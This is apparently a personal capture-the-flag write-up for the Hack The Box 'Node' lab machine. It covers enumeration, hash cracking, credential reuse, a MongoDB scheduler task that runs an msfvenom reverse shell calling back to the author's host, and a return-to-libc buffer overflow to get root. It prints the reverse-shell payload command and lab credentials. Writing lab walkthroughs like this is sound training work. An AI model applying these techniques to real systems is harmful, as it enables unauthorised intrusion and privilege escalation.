# NODE | 10.10.10.58

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap/initial 10.10.10.58
    
### Open Ports and Their Services

* 22 - SSH - OpenSSH 7.2p2 Ubuntu
* 3000 - HADOOP TASKTRACKER Apache

## Service Enumeration

### 22 - SSH

SSH service, a little dated, but typical. SSH exploits are pretty rare, so I'll probably only use this if I get valid user credentials.

### 3000 - HADOOP (actually just HTTP)

This is actually running a webserver I think; and the nmap script did a bit of enumeration for me, so I know I can go to `/login`.

![](img/port-3000-hadoop.png)

This website seems to be dynamically generated, and I was getting nowhere until I first checked out some of the js files, which indicated I could find other directories:

![](img/app-js.png)

I could navigate to `/partials/admin.html` but I couldn't interact with anything on the page (including the download backup button):

![](img/admin-html.png)

After pfaffing around a bit I figured it was a good idea to use BurpSuite to analyze the traffic and see what I could find. The 'api' section looked promising:

![](img/burp-1.png)

Those definitely look like hashes; but as indicated I won't be able to access the admin area with any of these. This info was found in '/api/users/latest', so I thought I'd try just '/api/users' to see if there were any other users and the admin account was there:

![](img/admin-hash.png)

When you get a hash, before you try cracking it yourself, first go to [CrackStation](https://crackstation.net) and check if the hash has been submitted already:

![](img/manchester.png)

## Exploitation

OK, so now I have the admin username and the password. Time to see what's on the other side.

![](img/backup.png)

It's the pretty version of the previous page that I could not interact with.

I downloaded the backup and it appeared to be just gibberish, but then I guessed it was base64 encoded, so I piped it through a decoder and discovered it was a zip archive:

    cat myplace.backup | base64 -d > backup
    
![](img/zip.png)

It asks for a password to decrypt, and 'manchester' is not it. Since I've had to do this before, I knew I had to extract a hash out of it, so I ran `zip2john backup.zip > hash` and then cracked it using john, it took a nanosecond:

![](img/hash.png)
![](img/magicword.png)

After unzipping, I see it is indeed a backup of the website, and there are a LOT of files.

![](img/myplace.png)

In the main `/myplace` dir is the app.js, and after checking that out I see credentials for their mongo database:

![](img/mark.png)

(the pic is the admin account photo for the website)


Let's try the credentials in SSH:

![](img/mark-shell.png)

Nice! Now we have a shell as mark. I found the user flag in tom's home dir, but we don't have permission to read it. Time to enumerate.

## User Enumeration

Something interesting to note is that in the `/home` dir there is a directory for a user called 'frank', but no corresponding entry in `/etc/passwd`.

Mark is not allowed to run sudo on this box, so there is no privesc vector there. I sent linpeas and pspy over and linpeas picked up something potentially interesting:

![](img/bin-backup.png)

That is the program used to create the backup that I downloaded. And it appears to be an SUID binary. It is a 32 bit binary, and after running strings on it I can see that it may be vulnerable to a buffer overflow attack:

![](img/strncpy.png)

But only tom and root are allowed to run this binary, so I am back to the drawing board, or rather poring over the linpeas output again. I see that tom is the one running the website, and also one other app:

![](img/ps-aux.png)

## Privilege Escalation

At this point I'll admit to being fully over my head, only understanding that I probably had to connect to the mongo db and add an entry somehow, all of which was new to me. So I consulted a writeup to understand better.

I have mark's creds to connect to the db, and the scheduler program basically executes a task you place in the tasks table.

    mongo -u mark -p 5AYRft73VtFpc84k localhost:27017/scheduler
    
What I need to do next is upload a reverse shell payload to the machine and then insert the execution of the payload as a task. I use msfvenom to generate the payload:

    msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.21 LPORT=6969 -f elf -o koopa
    
Then use scp to send it over to the target machine:

    scp koopa mark@10.10.10.58:/dev/shm
    
After making it executable and setting up a listener on my end, I enter the mongo instance to add the task:

![](img/task.png)

In a moment, I have a shell as the user 'tom':

![](img/tom-shell.png)

### Flag

![](img/tom-flag.png)

## Privilege Escalation

Now we already know that the most likely privesc vector is via the 'backup' binary so I have brought it over to my machine for analysis. It doesn't do anything, so I return to the version on the victim machine and run a few operations on it. 

Running `strings` shows me that the program has a potentially vulnerable function in it ('strcpy'), which suggests that it could be susceptible to a buffer overflow attack.

![](img/strncpy.png)

(Spoiler alert: it is vulnerable to a buffer overflow, as well as two to three other non-intended routes to privesc. I'm just going to do the buffer overflow though. Also, I was totally bereft on this box at this point, so I watched [ippsec's walkthrough](https://www.youtube.com/watch?v=sW10TlZF62w) on it, and then used it to refresh my methodology on overflow attacks that I had learned on the OCTOBER box)

### Buffer Overflow in Vulnerable Binary

To confirm that I could crash the binary with a long string of data I opened it in gdb and threw in a long string of A's as one of the arguments. This program required a specific number of arguments as well as specific strings in order to run. To figure that out I had to do a lot of debugging in radare2, which is a program I do not know how to use at all.

Luckily the first argument can be anything at this point, but for the second argument you need to supply a specific alphanumeric string - the binary checks the string you supply against `/etc/myplace/keys` and will continue if they match.

![](img/myplace-keys.png)

So, after figuring that out, I could run the binary inside gdb and supply a long string as the third argument:

![](img/ovrflw-aaaa.png)

So it crashed. Next step is to find the EIP and to do that normally I would run `pattern_create` in Kali but since I am not running Kali and haven't found a way to have that on my system yet I went [online](https://wiremask.eu/tools/buffer-overflow-pattern-generator/) and that worked in the same way:

![](img/offset.png)

So, the crash is at exactly 512 bytes. To confirm for sure I send the binary 512 A's and then 4 B's to check if those B's overwrite the EIP:

![](img/EIP.png)

The method to exploit a buffer overflow on this system is to do a [Return to libc](https://en.wikipedia.org/wiki/Return-to-libc_attack) attack, since ASLR is enabled on the system the addresses are somewhat randomized (within a set boundary). We need to do a bruteforce-type attack and hope the script hits upon the correct address.

I have already done one of these with the OCTOBER box, so I grabbed the exploit from [there](../27-OCTOBER/exploits/buffy.py), and modified it to work in this instance. I had to run a few commands on the box to find the needed memory addresses. The script itself is pretty well-documented in it's comments so I'll not go into it here.

Needless to say, when I input the correct addresses and changed the command to include the extra arguments, I ran the attack and eventually got a root shell:

![](img/root-buff-shell.png)

### Flag

![](img/root-flag.png)

## Conclusion

A brain buster for me. Pretty much sought assistance the whole time. I need to bone up on my Linux debugging programs. But as always, buffer overflows are always intimidating and fun at the same time.

Steps taken:

* find website admin hash in exposed api directory
* use admin creds to download website backup
* find user credentials in backup, log in via SSH
* user creds reused for database backend
* use creds to create task that executes reverse shell payload for privesc
* exploit buffer overflow to gain root shell
